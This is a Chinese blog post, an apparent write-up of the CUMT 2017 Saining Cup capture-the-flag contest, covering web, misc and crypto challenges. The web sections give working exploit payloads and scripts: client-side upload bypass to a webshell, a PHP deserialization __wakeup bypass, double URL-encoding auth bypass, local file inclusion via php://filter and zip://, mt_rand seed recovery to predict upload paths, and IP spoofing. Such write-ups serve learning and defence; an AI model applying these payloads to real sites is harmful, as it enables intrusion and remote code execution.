<!DOCTYPE html>
<html lang="zh-CN">
  <head>
    
<meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>


<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />

<meta name="theme-color" content="#f8f5ec" />
<meta name="msapplication-navbutton-color" content="#f8f5ec">
<meta name="apple-mobile-web-app-capable" content="yes">
<meta name="apple-mobile-web-app-status-bar-style" content="#f8f5ec">



  <meta name="description" content="CUMT2017赛宁杯"/>




  <meta name="keywords" content="ctf, writeup, 八一" />



  <meta name="baidu-site-verification" content="HhUstaSjr0" />



  <meta name="google-site-verification" content="UA-102975942-1" />






  <link rel="alternate" href="/atom.xml" title="八一">




  <link rel="shortcut icon" type="image/x-icon" href="/favicon.ico?v=2.6.0" />



<link rel="canonical" href="https://bay1.top/2017/06/07/CUMT2017赛宁杯/"/>


<link rel="stylesheet" type="text/css" href="/css/style.css?v=2.6.0" />
<link rel="stylesheet" type="text/css" href="/css/prettify.css" media="screen" />
<link rel="stylesheet" type="text/css" href="/css/sons-of-obsidian.css" media="screen" />



  <link rel="stylesheet" type="text/css" href="/lib/fancybox/jquery.fancybox.css" />




  










    <title> CUMT2017赛宁杯 - 八一 </title>
  </head>

  <body><div id="mobile-navbar" class="mobile-navbar">
</div>


    <div class="container" id="mobile-panel">

      <main id="main" class="main">
        <div class="content-wrapper">
          <div id="content" class="content">
            
  
  <article class="post">
    <header class="post-header">
      <h1 class="post-title">
        
          CUMT2017赛宁杯
        
      </h1>

      <div class="post-meta">
        <span class="post-time">
          2017-06-07
        </span>
        
        
        
      </div>
    </header>

    
    
  <div class="post-toc" id="post-toc">
    <h2 class="post-toc-title">文章目录</h2>
    <div class="post-toc-content">
      <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#upload"><span class="toc-text">upload</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#unserialize3"><span class="toc-text">unserialize3</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#PHP2"><span class="toc-text">PHP2</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#guess"><span class="toc-text">guess</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#easyweb"><span class="toc-text">easyweb</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#摩斯电码"><span class="toc-text">摩斯电码</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#hong"><span class="toc-text">hong</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#misc-pic-again"><span class="toc-text">misc_pic_again</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#rfc"><span class="toc-text">rfc</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Bitwise"><span class="toc-text">Bitwise</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#小结"><span class="toc-text">小结</span></a></li></ol>
    </div>
  </div>


    <div class="post-content">
      
        <p>。。。。。。<a id="more"></a></p>
<blockquote>
<p>由于下午去学生在线要验收任务，就做了大半天吧<br>这些题目，学长们都懒得出wp了。。。。我就稍微写点东西吧</p>
</blockquote>
<h2 id="upload"><a href="#upload" class="headerlink" title="upload"></a>upload</h2><blockquote>
<p>打开页面是一个上传页面。直接上传 php 被拦截，但拦截只是前端 JS 的后缀白名单（见下面的代码），把 php 加进白名单（或者干脆用 Burp 重放请求）就能绕过<br>然后传个大马，掏出 bp 改包</p>
</blockquote>
// Client-side extension whitelist from the challenge's upload page.
// NOTE(review): this runs in the uploader's own browser, so it is not a
// security control -- the author simply edited the whitelist; re-enabling the
// submit button or replaying the request in Burp works just as well. Only the
// server-side checks matter.
function check(){
upfile = document.getElementById("upfile");
submit = document.getElementById("submit");
name = upfile.value;
ext = name.replace(/^.+\./,'');   // greedy match: keeps only the text after the last dot

// Array.prototype.contains is not a standard method (includes() is);
// presumably polyfilled elsewhere on the page.
if(['jpg','png','php'].contains(ext)){
	submit.disabled = false; // 'php' was added to the whitelist by the author to get past this check
}else{
	submit.disabled = true;

	alert('请选择一张图片文件上传!');
}
}
<blockquote>
<p>在 Burp 里把请求中该文件的 Content-Type 改为：image/gif（服务端只校验客户端自己声明的 MIME 类型，这个值完全由攻击者控制，因此不算有效防护）</p>
</blockquote>
<p><img src="https://s1.ax1x.com/2018/01/01/pSf2T0.png" alt="upload"></p>
<p><img src="https://s1.ax1x.com/2018/01/01/pSfWkV.png" alt="upload"></p>
<p><img src="https://s1.ax1x.com/2018/01/01/pSffYT.png" alt="upload"></p>
<h2 id="unserialize3"><a href="#unserialize3" class="headerlink" title="unserialize3"></a>unserialize3</h2><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">xctf</span></span>&#123; </span><br><span class="line"><span class="keyword">public</span> $flag = <span class="string">'111'</span>;</span><br><span class="line"><span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__wakeup</span><span class="params">()</span></span>&#123;</span><br><span class="line"><span class="keyword">exit</span>(<span class="string">'bad requests'</span>);</span><br><span class="line">&#125;</span><br><span class="line">?code=</span><br></pre></td></tr></table></figure>
<blockquote>
<p>看标题和代码就知道要绕过 __wakeup：把序列化串里的属性个数写成 2（实际只有 1 个），PHP 在属性数与实际不符时会跳过 __wakeup()（即 CVE-2016-7124，PHP 5.6.25 / 7.0.10 已修复，所以只对旧版本有效）。用下面的脚本生成正常的序列化串，再手工把 :1: 改成 :2: 就 OK 了<br>payload=xxxxx/?code=O:4:%22xctf%22:2:{s:4:%22flag%22;s:3:%22111%22;}</p>
</blockquote>
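// Builds the unserialize3 payload. serialize() alone yields
// O:4:"xctf":1:{...}, which would still trigger __wakeup() on the target; the
// declared property count has to be bumped above the real one so that
// unserialize() skips __wakeup(). That count-mismatch trick (CVE-2016-7124)
// was fixed in PHP 5.6.25 / 7.0.10, so it only works against older interpreters.
class xctf{ 
	public $flag = '111';
}

/**
 * Serialize a fresh xctf and inflate its declared property count.
 *
 * @param int $bump how many extra (non-existent) properties to declare; 0 returns plain serialize() output
 * @return string e.g. O:4:"xctf":2:{s:4:"flag";s:3:"111";}  (URL-encode the quotes before sending)
 */
function xctf_payload($bump = 1)
{
	$raw = serialize(new xctf());
	// The count sits between the class name and the opening brace: O:4:"xctf":N:{
	return preg_replace_callback(
		'/^(O:\d+:"[^"]*":)(\d+)(:\{)/',
		function ($m) use ($bump) { return $m[1] . ((int)$m[2] + $bump) . $m[3]; },
		$raw
	);
}

$abc = new xctf();
echo serialize($abc);     // plain form (count 1): __wakeup() would fire
echo "\n";
echo xctf_payload();      // bypass form (count 2)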
<h2 id="PHP2"><a href="#PHP2" class="headerlink" title="PHP2"></a>PHP2</h2><blockquote>
<p>打开链接显示：Can you anthenticate to this website?其他什么也没有。。。先开始尝试常见的源码备份后缀<br>index.php.txt,index.txt,index.php.swp……然后就是啥也没有，搜了搜 anthenticate 发现是原题。。。<br>看完原题，我就感觉这道题被他改坏了。。。。。。<span style="color:red;">原题里页面上有提示源码在 index.phps 好不好。。。。。</span><br>访问 index.phps 得到源码</p>
</blockquote>
// index.phps from the PHP2 challenge (fragment: the surrounding <?php ... ?>
// tags are not shown, and the last line is page HTML rather than PHP).
// NOTE: $_GET[id] uses the bare constant `id`, which PHP falls back to the
// string "id" (with a notice); it works, but is not how the key should be written.
if("admin"===$_GET[id]) {
  echo("<p>not allowed!</p>");
  exit();
}

// The bug: PHP already URL-decoded the query string once when it filled $_GET,
// so this second urldecode() lets "%2561dmin" arrive as "%61dmin" (passes the
// strict === check above) and then become "admin" here.
$_GET[id] = urldecode($_GET[id]);
if($_GET[id] == "admin")
{
  echo "<p>Access granted!</p>";
  echo "<p>Key: xxxxxxx </p>";
}

Can you anthenticate to this website?
<blockquote>
<p>原因是 PHP 在填充 $_GET 时已经 URL 解码过一次，代码里又 urldecode 了第二次：传 %2561dmin，第一次解码得到 %61dmin，绕过了前面 === "admin" 的严格比较；第二次解码变成 admin，通过后面的 == 判断。所以对 admin 做二次 URL 编码即可绕过并通过验证<br>payload=xxx/index.php?id=%2561%2564%256d%2569%256e</p>
</blockquote>
<h2 id="guess"><a href="#guess" class="headerlink" title="guess"></a>guess</h2><blockquote>
<p><span style="color:red;">这是NJCTF原题</span><br>上传一张图片，发现链接变成了xxx/?page=upload<br>index.php 只过滤了 ..，伪协议不受影响，可以本地包含读取源码：xxx/?page=php://filter/convert.base64-encode/resource=upload 和 index<br>接下来的思路就是上传一个装着 php 马的压缩包（改名为 png，MIME 改成图片类型），再用 zip:// 或 phar:// 伪协议包含压缩包里的马，得到 shell<br>这次的主要问题在于，题目给保存的文件名加了一个由 mt_rand() 生成的 32 位随机前缀，需要先从泄露的 SESSI0N cookie 恢复随机数种子，算出文件名才能利用</p>
</blockquote>
// upload.php from the "guess" challenge, as read back through php://filter.
// Annotated to show where the file-name prediction comes from.
error_reporting(0);
function show_error_message($message)
{
    // Prints an error box and stops; $message is interpolated unescaped.
    die("<div class=\"msg error\" id=\"message\">
    <i class=\"fa fa-exclamation-triangle\"></i>$message</div>");
}

function show_message($message)
{
    // Prints a success box; $message is interpolated unescaped.
    echo("<div class=\"msg success\" id=\"message\">
    <i class=\"fa fa-exclamation-triangle\"></i>$message</div>");
}

// Builds the random prefix of the stored file name: $length symbols from a
// 61-symbol alphabet [a-zA-Z1-9] (no "0") via mt_rand(0, 60). The output is
// fully determined by the mt_srand() seed set below -- that is what the solve exploits.
function random_str($length = "32")
{
    $set = array("a", "A", "b", "B", "c", "C", "d", "D", "e", "E", "f", "F",
        "g", "G", "h", "H", "i", "I", "j", "J", "k", "K", "l", "L",
        "m", "M", "n", "N", "o", "O", "p", "P", "q", "Q", "r", "R",
        "s", "S", "t", "T", "u", "U", "v", "V", "w", "W", "x", "X",
        "y", "Y", "z", "Z", "1", "2", "3", "4", "5", "6", "7", "8", "9");
    $str = '';

    for ($i = 1; $i <= $length; ++$i) {
        $ch = mt_rand(0, count($set) - 1);
        $str .= $set[$ch];
    }

    return $str;
}

session_start();

// Unanchored: only requires the extension to *contain* one of these substrings.
$reg='/gif|jpg|jpeg|png/';
if (isset($_POST['submit'])) {

    // Weak point: the seed space is only 1e9, and the first mt_rand() output
    // is leaked (hashed) in the SESSI0N cookie. Recover $ss from the hash,
    // recover $seed from $ss (php_mt_seed), and random_str() below is predictable.
    $seed = rand(0,999999999);
    mt_srand($seed);
    $ss = mt_rand();
    $hash = md5(session_id() . $ss);   // session_id() is "" when no PHPSESSID cookie is sent
    setcookie('SESSI0N', $hash, time() + 3600);

    // NOTE: reads $_FILES["file"], but the form field is "file-upload-field";
    // with error_reporting(0) the undefined index is silent and this never fires.
    if ($_FILES["file"]["error"] > 0) {
        show_error_message("Upload ERROR. Return Code: " . $_FILES["file-upload-field"]["error"]);
    }
    // MIME type is the client-supplied Content-Type -- attacker controlled.
    $check2 = ((($_FILES["file-upload-field"]["type"] == "image/gif")
            || ($_FILES["file-upload-field"]["type"] == "image/jpeg")
            || ($_FILES["file-upload-field"]["type"] == "image/pjpeg")
            || ($_FILES["file-upload-field"]["type"] == "image/png"))
        && ($_FILES["file-upload-field"]["size"] < 204800));
    // True (reject) only when the extension has no image substring; a zip
    // renamed to "php.png" passes and is stored byte-for-byte.
    $check3=!preg_match($reg,pathinfo($_FILES['file-upload-field']['name'], PATHINFO_EXTENSION));


    if ($check3) show_error_message("Nope!");
    if ($check2) {
        // Stored as <32 predictable chars>_<original name> in a fixed directory,
        // so a recovered seed yields the exact path to feed to zip://.
        $filename = './uP1O4Ds/' . random_str() . '_' . $_FILES['file-upload-field']['name'];
        if (move_uploaded_file($_FILES['file-upload-field']['tmp_name'], $filename)) {
            show_message("Upload successfully. File type:" . $_FILES["file-upload-field"]["type"]);
        } else show_error_message("Something wrong with the upload...");
    } else {
        show_error_message("only allow gif/jpeg/png files smaller than 200kb!");
    }
}
// index.php from the "guess" challenge: the local file inclusion used both to
// read the sources (php://filter) and to include the uploaded archive (zip://).
error_reporting(0);

session_start();
if(isset($_GET['page'])){
    $page=$_GET['page'];
}else{
    $page=null;
}

// Only "../" traversal is blocked. Stream wrappers (php://filter, zip://,
// phar://) contain no ".." and pass straight through -- an allowlist of page
// names would close both the source disclosure and the code execution.
if(preg_match('/\.\./',$page))
{
    echo "<div class=\"msg error\" id=\"message\">
    <i class=\"fa fa-exclamation-triangle\"></i>Attack Detected!</div>";
    die();
}

if($page)
{
    // The appended ".php" is what the zip://...png#php payload relies on: the
    // fragment "php" plus ".php" selects the entry php.php inside the archive.
    if(!(include($page.'.php')))
    {
        echo "<div class=\"msg error\" id=\"message\">
    <i class=\"fa fa-exclamation-triangle\"></i>error!</div>";
        exit;
    }
}
<blockquote>
<p>问题代码</p>
</blockquote>
// The two lines that leak generator state: the cookie is md5(session_id . $ss),
// where $ss is the first mt_rand() after mt_srand($seed). Knowing the session id
// (or sending none, so it is "") and cracking the md5 gives $ss; php_mt_seed then
// recovers $seed, which predicts the random_str() prefix of the stored file.
$hash = md5(session_id().$ss);
setcookie('SESSI0N', $hash, time() + 3600);
<blockquote>
<p>先上传一个把 php 马压缩后改名成 png 的文件，此时我们发的 PHPSESSID 就是 session_id()，返回的 SESSI0N cookie 就是 hash<br>第一种方法：先解出 $ss，再用 php_mt_seed 爆破 mt_srand 的种子。看代码 hash 是 md5(session_id().$ss)，如果上传时不带 PHPSESSID cookie，session_id() 为空，hash 就是纯数字 $ss 的 MD5，cmd5 这类查表站很容易解出来<br>之后，用下图的命令爆破种子（php_mt_seed 会按 PHP 版本给出候选，7.1 起 mt_rand 带范围参数时的取值方式变了，要按目标版本选）<br>最后，用下面的脚本预测文件名：先 mt_srand(种子)，调用一次 mt_rand() 对齐服务端取 $ss 的那一步，再跑 random_str()<br>payload=xxx/?page=zip://uP1O4Ds/nZ2rdPYLpJqFNSmv4Kon8mGxfrWzYeqt_php.png%23php&amp;php<br>（include 会自动拼上 .php，所以 #php 最终指向压缩包内的 php.php）</p>
</blockquote>
<p><img src="https://s1.ax1x.com/2018/01/01/pSfiJU.png" alt="seed"></p>
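// Predicts the random upload-directory prefix for the "guess" challenge once the
// mt_srand() seed has been recovered (php_mt_seed on the cracked $ss).
// Usage: php predict.php [seed]   -- defaults to the seed found during the CTF.
//
// NOTE(review): mt_rand(min, max) range scaling changed in PHP 7.1, so run this
// under the same PHP major version as the target or the 32-char prefix will differ.
$seed = isset($argv[1]) ? (int)$argv[1] : 75123790;
mt_srand($seed);
// The server calls mt_rand() once for $ss before random_str(); consume the same
// output here so the generator state lines up.
echo mt_rand();
echo "\n\n";

/**
 * Same generator as the server's upload.php: $length symbols drawn from the
 * 61-symbol alphabet [a-zA-Z1-9] (no "0") via mt_rand(0, 60).
 *
 * @param int|string $length number of symbols to produce (default "32")
 * @return string the generated prefix
 */
function random_str($length = "32")
{
    $set = array("a", "A", "b", "B", "c", "C", "d", "D", "e", "E", "f", "F",
        "g", "G", "h", "H", "i", "I", "j", "J", "k", "K", "l", "L",
        "m", "M", "n", "N", "o", "O", "p", "P", "q", "Q", "r", "R",
        "s", "S", "t", "T", "u", "U", "v", "V", "w", "W", "x", "X",
        "y", "Y", "z", "Z", "1", "2", "3", "4", "5", "6", "7", "8", "9");
    $str = '';

    for ($i = 1; $i <= $length; ++$i) {
        $ch = mt_rand(0, count($set) - 1);
        $str .= $set[$ch];
    }

    return $str;
}
echo random_str()."\n\r";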
<blockquote>
<p>第二种方法是直接用脚本从 0 到 999999999 逐个种子算 md5 和 cookie 比对，需要把 php.ini 里的 max_execution_time 设为 0（不限制）或者在 CLI 下跑<br>最坏要算 10 亿次 md5，这个方法比较慢。。。。。优先用 php_mt_seed</p>
</blockquote>
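// Brute-force fallback for the "guess" challenge: recover the mt_srand() seed by
// trying every value rand(0, 999999999) could have produced against the leaked
// SESSI0N cookie, then print the predicted upload prefix.
// Slow (up to 1e9 md5 calls): run from the CLI with max_execution_time=0.
// php_mt_seed on the cracked $ss is the faster route.

/**
 * Find the seed s in [0, $max] such that md5($session_id . first mt_rand() after mt_srand(s))
 * equals $target_hash.
 *
 * On success the generator is left seeded with the found seed and one output
 * consumed -- exactly the state upload.php is in when it calls random_str().
 *
 * @param string $session_id  the PHPSESSID sent with the upload ("" if none was sent)
 * @param string $target_hash the SESSI0N cookie value (32 hex chars, any case)
 * @param int    $max         last seed to try, inclusive
 * @return int|null the seed, or null if nothing in range matched
 */
function find_seed($session_id, $target_hash, $max = 999999999)
{
    $target_hash = strtolower($target_hash);
    for ($seed = 0; $seed <= $max; $seed++) {
        mt_srand($seed);
        $ss = mt_rand();
        if (md5($session_id . $ss) === $target_hash) {
            return $seed;
        }
    }
    return null;
}

// Run the search only when executed directly, so the function can be included or tested.
if (PHP_SAPI === 'cli' && isset($argv[0]) && realpath($argv[0]) === __FILE__) {
    $session_id = "kfm3fk6doepaefpaa9al32h8j7";
    $hash2 = "72a6022fd34bf1980ea8d20aafa3bd2a";
    $found = find_seed($session_id, $hash2);
    if ($found === null) {
        echo "run down!we can't get it!";
    } else {
        echo "we get seed:" . $found;
        // random_str() is the generator from the upload.php listing above; it must be
        // defined in this file. Only printed on success -- the original printed a
        // meaningless prefix even when no seed matched.
        echo './uP1O4Ds/' . random_str() . '_';
    }
}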
<h2 id="easyweb"><a href="#easyweb" class="headerlink" title="easyweb"></a>easyweb</h2><blockquote>
<p>哇，这道题虽然对学长们来说很简单，我还是长了不少知识<br>学到的知识点是密码找回漏洞和上传绕过，最重要的是上传的新姿势。<br>首先随便注册一个账号，利用找回密码功能重置admin账户的密码</p>
</blockquote>
<p><img src="https://s1.ax1x.com/2018/01/01/pSfo6J.png" alt="user"></p>
<blockquote>
<p>进入admin页面，提示IP不被允许<br>伪造IP，把X-Forwarded-For改为127.0.0.1，我用的是火狐插件，Bp（Burp Suite）也可以<br>然后打开admin页面源码，提示module=filemanage&amp;do=??<br>do参数是upload，别问我怎么知道的，自己猜，或者查查filemanage<br>然后就是上传绕过，这里要构造一个图片马<br>而且php的起始标记还可以写成这样：<a href="http://php.net/manual/en/language.basic-syntax.phptags.php" target="_blank" rel="noopener">script language=”php”</a><br>把下面的代码加到一张图片中就行了</p>
</blockquote>
<!-- NOTE(review): the script language="php" tag form was removed in PHP 7.0, so an uploaded file that relies on it is only interpreted by PHP 5.x and older; upload filters that only look for the standard open tag miss it on those versions, which is why content-based checks should inspect the stored file type rather than tag strings. -->
<figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;script language="php"&gt;phpinfo()&lt;/script&gt;</span><br></pre></td></tr></table></figure>
<p><img src="https://s1.ax1x.com/2018/01/01/pSR1AK.png" alt="easyweb"></p>
<h2 id="摩斯电码"><a href="#摩斯电码" class="headerlink" title="摩斯电码"></a>摩斯电码</h2><blockquote>
<p>调到高音模式</p>
</blockquote>
<p><img src="https://s1.ax1x.com/2018/01/01/pSWJaV.png" alt="pitch"><br><img src="https://s1.ax1x.com/2018/01/01/pSRxUK.png" alt="mosi"></p>
<h2 id="hong"><a href="#hong" class="headerlink" title="hong"></a>hong</h2><blockquote>
<p>在linux下打开，使用foremost命令分离文件<br>得到的图片中含有flag</p>
</blockquote>
<h2 id="misc-pic-again"><a href="#misc-pic-again" class="headerlink" title="misc_pic_again"></a>misc_pic_again</h2><blockquote>
<p>原题改造，最后用十六进制方式打开，以前写过<a href="https://bayi87.github.io/2017/03/02/%E5%A4%A9%E6%9C%9D%E6%8C%96%E7%85%A4ctf--1/" target="_blank" rel="noopener">原题</a></p>
</blockquote>
<h2 id="rfc"><a href="#rfc" class="headerlink" title="rfc"></a>rfc</h2><blockquote>
<p>密文 teucbonojmsvrhlzdglgsaleccpehqikrwfxupoeteayofairifneihr，用栅栏密码解密。为啥？试试就知道了。</p>
</blockquote>
<p><img src="https://s1.ax1x.com/2018/01/01/pSf9oV.png" alt="rfc"></p>
<h2 id="Bitwise"><a href="#Bitwise" class="headerlink" title="Bitwise"></a>Bitwise</h2><blockquote>
<p>下载附件，是个py脚本</p>
</blockquote>
<!-- NOTE(review): each element of user_arr depends only on the character at the same position, and the comparison is a plain list equality, so the check can be solved one position at a time (the next listing does exactly that). A per-character fixed transform is not a substitute for a keyed hash when verifying a secret. -->
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#!/usr/bin/env python</span></span><br><span class="line">user_submitted = raw_input(<span class="string">"Enter Password: "</span>)</span><br><span class="line"><span class="keyword">if</span> len(user_submitted) != <span class="number">10</span>:</span><br><span class="line">  <span class="keyword">print</span> <span class="string">"Wrong"</span></span><br><span class="line">  exit()</span><br><span class="line"></span><br><span class="line"><span class="comment">#条件一输入的密码长度等于10</span></span><br><span class="line"></span><br><span class="line">verify_arr = [<span class="number">193</span>, <span class="number">35</span>, <span class="number">9</span>, <span class="number">33</span>, <span class="number">1</span>, <span class="number">9</span>, <span class="number">3</span>, <span class="number">33</span>, <span class="number">9</span>, <span class="number">225</span>]</span><br><span class="line">user_arr = []</span><br><span class="line"><span class="keyword">for</span> char <span class="keyword">in</span> user_submitted:</span><br><span class="line">  <span class="comment"># 
'&lt;&lt;' is left bit shift</span></span><br><span class="line">  <span class="comment"># '&gt;&gt;' is right bit shift</span></span><br><span class="line">  <span class="comment"># '|' is bit-wise or</span></span><br><span class="line">  <span class="comment"># '^' is bit-wise xor</span></span><br><span class="line">  <span class="comment"># '&amp;' is bit-wise and</span></span><br><span class="line">  user_arr.append( (((ord(char) &lt;&lt; <span class="number">5</span>) | (ord(char) &gt;&gt; <span class="number">3</span>)) ^ <span class="number">111</span>) &amp; <span class="number">255</span> )</span><br><span class="line">  </span><br><span class="line">  <span class="comment">#这里验证输入的密码，所以我们就可以根据验证条件爆破出密码</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> (user_arr == verify_arr):</span><br><span class="line">  <span class="keyword">print</span> <span class="string">"Success"</span></span><br><span class="line"><span class="keyword">else</span>:</span><br><span class="line">  <span class="keyword">print</span> <span class="string">"Wrong"</span></span><br></pre></td></tr></table></figure>
<!-- NOTE(review): the last line prints the undefined name `password` and would raise NameError; the recovered characters are collected in user_arr, so it should be print ''.join(user_arr). Also, if no j in range(128) matches a position, that slot silently stays 0 rather than signalling failure. -->
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">verify_arr = [<span class="number">193</span>, <span class="number">35</span>, <span class="number">9</span>, <span class="number">33</span>, <span class="number">1</span>, <span class="number">9</span>, <span class="number">3</span>, <span class="number">33</span>, <span class="number">9</span>, <span class="number">225</span>]</span><br><span class="line">user_arr = [<span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>]</span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">10</span>):</span><br><span class="line">    <span class="keyword">for</span> j <span class="keyword">in</span> range(<span class="number">128</span>):</span><br><span class="line">        <span class="keyword">if</span> verify_arr[i] == (((j&lt;&lt; <span class="number">5</span> | j&gt;&gt; <span class="number">3</span>) ^ <span class="number">111</span>) &amp; <span class="number">255</span>):</span><br><span class="line">            user_arr[i] = chr(j) <span class="comment">#转换为字母</span></span><br><span class="line">            <span class="keyword">break</span></span><br><span class="line"><span class="keyword">print</span> password</span><br></pre></td></tr></table></figure>
<h2 id="小结"><a href="#小结" class="headerlink" title="小结"></a>小结</h2><blockquote>
<p>感觉这比赛和考试是一样的，无论试卷简单还是难，都很难考到100分<br>但我们都能从两种试卷中学到一些东西</p>
</blockquote>
<p><span style="color:red;">Follow heart and desperate for freedom!</span></p>

      
    </div>

    
      
      



      
      
    

    
    

  </article>


          </div>
          
  </div>


        </div>
      </main>

    </div>

    
  
  <script type="text/javascript">
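    // Disqus page configuration; embed.js reads this global when it loads.
    var disqus_config = function () {
        this.page.url = 'https://bay1.top/2017/06/07/CUMT2017赛宁杯/';
        this.page.identifier = '2017/06/07/CUMT2017赛宁杯/';
        this.page.title = 'CUMT2017赛宁杯';
    };
    (function() {
    var d = document, s = d.createElement('script');

    // Explicit https: rather than a protocol-relative URL, so the third-party
    // script is never fetched over plain http even if the page is served that way.
    // NOTE(review): the shortname 'https-blog-flywinky-top-1' does not look like
    // it belongs to bay1.top; possibly a leftover from a copied theme config.
    // Confirm it is the intended Disqus site.
    s.src = 'https://https-blog-flywinky-top-1.disqus.com/embed.js';

    s.setAttribute('data-timestamp', +new Date());
    (d.head || d.body).appendChild(s);
    })();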
  </script>



    
  





  
    <script type="text/javascript" src="/lib/jquery/jquery-3.1.1.min.js"></script>
  

  
    <script type="text/javascript" src="/lib/slideout/slideout.js"></script>
  

  
    <script type="text/javascript" src="/lib/fancybox/jquery.fancybox.pack.js"></script>
  


    <script type="text/javascript" src="/js/src/even.js?v=2.6.0"></script>
<script type="text/javascript" src="/js/src/bootstrap.js?v=2.6.0"></script>
<script src="/js/prettify.js"></script>
<script type="text/javascript">
// Once the DOM is ready, tag every <pre> for google-code-prettify and run the highlighter.
$(function () {
  $('pre').addClass('prettyprint');
  prettyPrint();
});
</script>
  </body>
</html>
